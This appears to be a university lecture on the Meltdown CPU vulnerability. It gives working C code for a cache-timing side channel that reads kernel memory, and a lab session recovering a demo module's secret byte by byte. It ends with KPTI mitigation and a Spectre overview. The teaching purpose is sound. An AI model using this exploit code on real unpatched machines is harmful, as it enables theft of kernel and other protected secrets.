We continue our journey to launch a Meltdown attack, i.e., reading kernel memory from a user program. Today, we will cover out-of-order execution, the attack code itself, mitigations, and a brief look at Spectre.

Out-of-order Execution (from the original paper)

Out-of-order execution is an optimization technique that keeps all execution units of a CPU core as busy as possible.

Speculative nature

CPUs supporting out-of-order execution let operations run speculatively: the processor's out-of-order logic processes instructions before the CPU is certain that they will be needed and committed.

In particular, CPUs have branch prediction units that are used to obtain an educated guess of which instruction is executed next.

The bug

Although instructions executed out of order have no visible architectural effect on registers or memory once they are rolled back, they do have micro-architectural side effects.
Read again...

In particular, memory contents that were loaded into the cache during out-of-order execution are kept in the cache.

Implications Of the Bug In Our Context

Consider the following code:
 
//****** CHUNK 1 *********
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 ...
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");

 //****** CHUNK 2 *********
 uint8_t kernel_data = *addr;
 A[kernel_data * 4096] += 1;

 //...

  • Step 1: As discussed above, with out-of-order execution, the CPU will probably run the following three operations speculatively and in parallel.
    Chunk 1                  (access time: ----------------------------- )
    Chunk 2                  (access time: ------------------------ )
    Access check for Chunk 2 (access time: ------------ )
    
    Chunk 2 takes a long time if it really reads from physical memory, but we can make Chunk 1 as long as we want.
  • Step 2: The speculative execution of Chunk 1 is checked. It contains only legitimate instructions, so the result of running Chunk 1 is committed.
  • Step 3: It's time to check the speculative execution of Chunk 2. The access check fails. Roll back. Segmentation fault.

    Note that the segmentation fault is raised only after all of Chunk 1 has been committed, so that the correctness of the code is still maintained.

This is huge!

Because of the bug, the cache is not rolled back: after the fault, the cache still holds A[kernel_data*4096]!
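To see why a leftover cache entry is enough to leak a byte, here is a minimal sketch of the idea as a toy model. It does not touch the real cache: the type toy_cache and the functions toy_flush, toy_speculative_access, and toy_recover are hypothetical names introduced only for this illustration, and the model assumes one "cached" flag per 4096-byte slot of A.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define STRIDE 4096      /* distance between probe entries, as in A[v * 4096] */
#define NUM_VALUES 256   /* one probe entry per possible byte value */

/* Toy model (assumption): one "cached" flag per probe entry of A. */
typedef struct {
    bool cached[NUM_VALUES];
} toy_cache;

/* Models flushing the side channel: no probe entry is cached. */
void toy_flush(toy_cache *c) {
    for (int i = 0; i < NUM_VALUES; i++)
        c->cached[i] = false;
}

/* Models the speculative access A[kernel_data * 4096]:
   the register result is discarded later, but the cache entry remains. */
void toy_speculative_access(toy_cache *c, uint8_t kernel_data) {
    size_t offset = (size_t)kernel_data * STRIDE;
    c->cached[offset / STRIDE] = true;
}

/* Models the probe: returns the index of the cached entry, or -1 if none. */
int toy_recover(const toy_cache *c) {
    for (int i = 0; i < NUM_VALUES; i++)
        if (c->cached[i])
            return i;
    return -1;
}
```

In the real attack, the "cached" flag is not directly visible; we infer it from how long each access to A[i*4096] takes.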

Let's write the code

main() function

As with the previous lecture, our main function should look as follows:

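#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <x86intrin.h>   // _mm_clflush, __rdtscp

int fd;
uint8_t *addr;           // kernel address to read (a pointer, not a byte)

void catch_segv(int signum);
void try();

int main()
{
  fd = open("/proc/secret_data", O_RDONLY);
  if (fd < 0) {
    perror("open");
    return -1;
  }

  void *input;
  printf("address: ");
  if (scanf("%p", &input) != 1)
    return -1;
  addr = input;

  struct sigaction action;
  sigemptyset(&action.sa_mask);
  action.sa_flags = SA_NODEFER;   // allow SIGSEGV again inside the handler
  action.sa_handler = catch_segv;
  sigaction(SIGSEGV, &action, NULL);

  try();

  return 0;
}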
The only addition is opening /proc/secret_data, which is provided by the kernel module; the module must be loaded first so that the kernel address we enter makes sense. Remember that the program is not able to read the contents of kernel space directly.

Other helper functions


void flush_side_channel()
{
  for (int i = 0; i < 256; i++) 
    A[i*4096] = 1;

  for (int i = 0; i < 256; i++) 
    _mm_clflush(&A[i*4096]);
}
This function first writes to each of the 256 entries of A that we will probe, and then flushes those entries from the cache.

int scores[256];

void probe_and_update()
{
  volatile uint8_t* p;
  register uint64_t time1, time2;
  unsigned int junk;

  for (int i = 0; i < 256; i++)
  {
     p = &A[i * 4096];           // probe entry i (do not overwrite the global addr)
     time1 = __rdtscp(&junk);
     junk = *p;                  // the memory access being timed
     time2 = __rdtscp(&junk) - time1;

     // if cache hit, add 1 for this value
     if (time2 <= CACHE_HIT_THRESHOLD)
        scores[i]++;
  }
}

void tally_statistics()
{
  int max = 0;
  for (int i = 0; i < 256; i++) {
    if (scores[max] < scores[i]) max = i;
  }

  printf("secret: %d %c (score=%d)\n", 
    max, max, scores[max]);

  exit(0);
}
We also need a function that checks the cache. To boost accuracy, we need to run the experiment many times. For this purpose, we keep a global array scores, where scores[i] counts how many times item i was found in the cache.
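The reason for repeating the experiment can be sketched with synthetic numbers. The following is only an illustration: the latencies (300, 50, 60), the threshold 80, the secret value 71, and the function names update_scores, best_guess, and simulate_rounds are all made up for this sketch and are not measurements or part of the lecture code.

```c
#include <stdint.h>

#define NUM_VALUES 256

/* Add one point to every index whose access time looks like a cache hit. */
void update_scores(const uint64_t timings[NUM_VALUES], uint64_t threshold,
                   int scores[NUM_VALUES]) {
    for (int i = 0; i < NUM_VALUES; i++)
        if (timings[i] <= threshold)
            scores[i]++;
}

/* Return the index with the highest score (the lowest index wins ties). */
int best_guess(const int scores[NUM_VALUES]) {
    int max = 0;
    for (int i = 1; i < NUM_VALUES; i++)
        if (scores[i] > scores[max])
            max = i;
    return max;
}

/* Synthetic experiment: value 71 is a hit in 9 out of 10 rounds,
   and every round also contains one stray hit at a varying index. */
int simulate_rounds(int rounds) {
    int scores[NUM_VALUES] = {0};
    for (int r = 0; r < rounds; r++) {
        uint64_t timings[NUM_VALUES];
        for (int i = 0; i < NUM_VALUES; i++)
            timings[i] = 300;                 /* made-up miss latency */
        if (r % 10 != 0)
            timings[71] = 50;                 /* made-up hit latency */
        timings[(r * 7) % NUM_VALUES] = 60;   /* noise: a stray hit */
        update_scores(timings, 80, scores);
    }
    return best_guess(scores);
}
```

A single round can easily point at the wrong index because of a stray hit, but over many rounds the real value collects far more points than any noise index.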

Meltdown Attack!

The following three functions are the core of the Meltdown attack.

Try accessing the kernel memory


int trial = 0;

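void meltdown()
{
  // Chunk 1: one asm statement, so the compiler cannot split it up
  asm volatile(
    ".rept 400\n\t"
    "add $0x432, %%rax\n\t"
    ".endr"
    : : : "rax", "cc");            // tell the compiler rax and flags change

  // Chunk 2: it will cause SIGSEGV
  uint8_t kernel_data = *addr;
  A[kernel_data * 4096] += 1;
}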

void try()
{
  trial++;
  flush_side_channel();

  int ret = pread(fd, NULL, 0, 0);
  if (ret < 0) {
    perror("pread");
    exit(0);
  }

  meltdown();
}
Some comments about the code above.
  • .rept 400 and .endr mean "copy and paste the in-between instructions 400 times".
  • In function try(), we call pread. This triggers a read in the kernel module, so that the module's data can stay in the cache.
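The effect of .rept and .endr can be checked with a small sketch. It assumes GCC or Clang targeting x86-64 with AT&T assembler syntax; the function name add_one_four_times is hypothetical and only serves this illustration.

```c
#include <stdint.h>

/* Assumes GCC or Clang on x86-64 (AT&T syntax). */
uint64_t add_one_four_times(uint64_t x) {
    __asm__ volatile(
        ".rept 4\n\t"        /* the assembler repeats the body 4 times */
        "add $1, %0\n\t"
        ".endr"
        : "+r"(x)            /* x is read and written in a register */
        :
        : "cc");             /* add modifies the flags */
    return x;
}
```

Calling add_one_four_times(10) executes four add instructions in a row, exactly as if we had written the add line four times by hand.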

Catching SIGSEGV


void catch_segv(int signum)
{
  trial++;

  if( trial <= 1000 )
  {
    probe_and_update(); 
    try();
  }

  tally_statistics();
}
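As you can see, the attack is repeated until trial exceeds 1000. Note that trial is incremented in both try() and catch_segv(), so the counter advances by two per round and the cache is probed about 500 times.
  • Before calling try() again, the code checks the cache and updates the array scores.
  • After all experiments are done, we tally the statistics.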
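The handler above continues the attack from inside the signal handler. A different and commonly used way to survive a SIGSEGV is to jump back to a saved point with sigsetjmp and siglongjmp. The sketch below shows that alternative technique, not the lecture's method; the names recover_point, on_segv, and can_read are hypothetical, and it assumes a POSIX system such as Linux.

```c
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <string.h>

static sigjmp_buf recover_point;

/* On SIGSEGV, jump back to the point saved by sigsetjmp. */
static void on_segv(int signum) {
    (void)signum;
    siglongjmp(recover_point, 1);
}

/* Returns 1 if one byte at p can be read, 0 if the read faults. */
int can_read(const volatile uint8_t *p) {
    struct sigaction action, old;
    memset(&action, 0, sizeof action);
    sigemptyset(&action.sa_mask);
    action.sa_handler = on_segv;
    sigaction(SIGSEGV, &action, &old);

    volatile int ok = 0;
    /* The second argument 1 saves the signal mask, so SIGSEGV is
       unblocked again after siglongjmp returns here. */
    if (sigsetjmp(recover_point, 1) == 0) {
        uint8_t value = *p;   /* may fault */
        (void)value;
        ok = 1;
    }

    sigaction(SIGSEGV, &old, NULL);   /* restore the previous handler */
    return ok;
}
```

With this pattern the control flow returns to an ordinary loop after each fault, instead of nesting one handler invocation inside another.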

Final code

meltdown.c.

Let's Launch the Attack!

choi@ubuntu:~$ uname -r
4.4.0-31-generic
choi@ubuntu:~/it432/lec/l25/resources$ make
make -C /lib/modules/4.4.0-31-generic/build M=/home/choi/it432/lec/l25/resources modules
make[1]: Entering directory '/usr/src/linux-headers-4.4.0-31-generic'
  CC [M]  /home/choi/it432/lec/l25/resources/mdown_kernel.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/choi/it432/lec/l25/resources/mdown_kernel.mod.o
  LD [M]  /home/choi/it432/lec/l25/resources/mdown_kernel.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.4.0-31-generic'
choi@ubuntu:~/it432/lec/l25/resources$ sudo insmod mdown_kernel.ko
[sudo] password for choi: 
choi@ubuntu:~/it432/lec/l25/resources$ dmesg | grep secret
[   72.197417] secret data address: 0xffffffffc0409000
choi@ubuntu:~/it432/lec/l25/resources$ gcc -march=native meltdown.c -o meltdown
choi@ubuntu:~/it432/lec/l25/resources$ ./meltdown
address:  0xffffffffc0409000
secret: 71 G (score=421)
choi@ubuntu:~/it432/lec/l25/resources$ ./meltdown
address:  0xffffffffc0409001
secret: 111 o (score=461)
choi@ubuntu:~/it432/lec/l25/resources$ ./meltdown
address:  0xffffffffc0409002
secret: 32   (score=470)
choi@ubuntu:~/it432/lec/l25/resources$ ./meltdown
address:  0xffffffffc0409003
secret: 78 N (score=470)

Mitigations

Kernel Page-Table Isolation (KPTI)

Mitigation of the vulnerability requires changes to operating system kernel code, including increased isolation of kernel memory from user-mode processes. Linux kernel developers refer to this measure as kernel page-table isolation (KPTI). KPTI patches were developed for Linux kernel 4.15 and were released as backports in kernels 4.14.11 and 4.9.75.
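On Linux kernels that include these patches, the kernel reports its Meltdown status in the sysfs file /sys/devices/system/cpu/vulnerabilities/meltdown, whose content starts with "Not affected", "Vulnerable", or "Mitigation:". The following is a minimal sketch of reading that file, assuming the file exists on the machine at hand (it does not on older kernels such as the 4.4 kernel used above); the enum and function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

typedef enum {
    MELTDOWN_UNKNOWN,
    MELTDOWN_NOT_AFFECTED,
    MELTDOWN_VULNERABLE,
    MELTDOWN_MITIGATED
} meltdown_state;

/* Classify one status line as reported by the kernel. */
meltdown_state classify_status(const char *line) {
    if (strncmp(line, "Not affected", 12) == 0)
        return MELTDOWN_NOT_AFFECTED;
    if (strncmp(line, "Mitigation:", 11) == 0)
        return MELTDOWN_MITIGATED;
    if (strncmp(line, "Vulnerable", 10) == 0)
        return MELTDOWN_VULNERABLE;
    return MELTDOWN_UNKNOWN;
}

/* Read the status file; returns MELTDOWN_UNKNOWN if it cannot be read. */
meltdown_state read_meltdown_state(void) {
    char line[128];
    FILE *f = fopen("/sys/devices/system/cpu/vulnerabilities/meltdown", "r");
    if (!f)
        return MELTDOWN_UNKNOWN;
    meltdown_state s = fgets(line, sizeof line, f) ? classify_status(line)
                                                   : MELTDOWN_UNKNOWN;
    fclose(f);
    return s;
}
```

On a kernel with KPTI enabled, the line typically reads "Mitigation: PTI", which this sketch classifies as MELTDOWN_MITIGATED.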

Hardware Fix

On 8 October 2018, Intel was reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its latest processors.

Spectre

Using a similar cache side-channel technique, Spectre breaks the isolation between different applications.

How it works

Besides executing instructions in parallel and speculatively, modern processors estimate which execution path is the most likely. This estimation can be supplied by the compiler and/or it can be found at runtime by the CPU itself.
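To get a feeling for how a CPU might estimate the likely path at runtime, here is a sketch of the textbook 2-bit saturating counter. This is a classroom model only; real processors use far more elaborate predictors, and the names predictor, predict_taken, train, and count_mispredictions are hypothetical.

```c
#include <stdbool.h>

/* Textbook 2-bit saturating counter:
   states 0 and 1 predict "not taken", states 2 and 3 predict "taken". */
typedef struct {
    int state;   /* always in the range 0..3 */
} predictor;

bool predict_taken(const predictor *p) {
    return p->state >= 2;
}

/* Move the counter one step toward the actual outcome. */
void train(predictor *p, bool taken) {
    if (taken) {
        if (p->state < 3)
            p->state++;
    } else {
        if (p->state > 0)
            p->state--;
    }
}

/* Run the predictor over a sequence of branch outcomes and
   count how often its guess was wrong. */
int count_mispredictions(predictor *p, const bool *outcomes, int n) {
    int misses = 0;
    for (int i = 0; i < n; i++) {
        if (predict_taken(p) != outcomes[i])
            misses++;
        train(p, outcomes[i]);
    }
    return misses;
}
```

The point to notice is that after a run of "taken" outcomes the predictor keeps guessing "taken" even when the branch finally goes the other way. A mispredicted path like that is what gets executed speculatively.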

Consider the following code:


if (x != x) 
  y = A[secret];  // never executed (are you sure?)
else 
  y = -1;
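Main Idea: Even though the condition is never true, the CPU may speculatively execute y = A[secret] before the branch is resolved. The result is rolled back, but the cache still holds A[secret].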
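A pattern that is often used to illustrate this class of attack is a bounds check followed by two dependent array accesses. The sketch below shows only the victim side and only its architectural behavior; the names array1, array2, array1_size, and victim are illustrative and the array contents are made up.

```c
#include <stddef.h>
#include <stdint.h>

#define STRIDE 4096

static uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8,
                             9, 10, 11, 12, 13, 14, 15, 16};
static size_t array1_size = 16;
static uint8_t array2[256 * STRIDE];   /* plays the role of the probe array */

/* Architecturally, an out-of-range x never reaches the array accesses:
   the function returns -1 instead. */
int victim(size_t x) {
    if (x < array1_size)
        return array2[array1[x] * STRIDE];
    return -1;
}
```

If the branch is predicted as taken for an out-of-range x, the two array accesses may still run speculatively. The function returns -1 as expected, but the cache entry of array2 selected by the out-of-bounds byte can remain, just like A[kernel_data*4096] in Meltdown.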

Effects and mitigations

One dangerous area is the Web browser, since it is something that everybody uses, and browsers run hostile JavaScript code all the time.

Since Spectre represents a whole class of attacks, there is most likely no single patch that covers all the different cases. However, it is possible to prevent specific known Spectre-based exploits through software patches.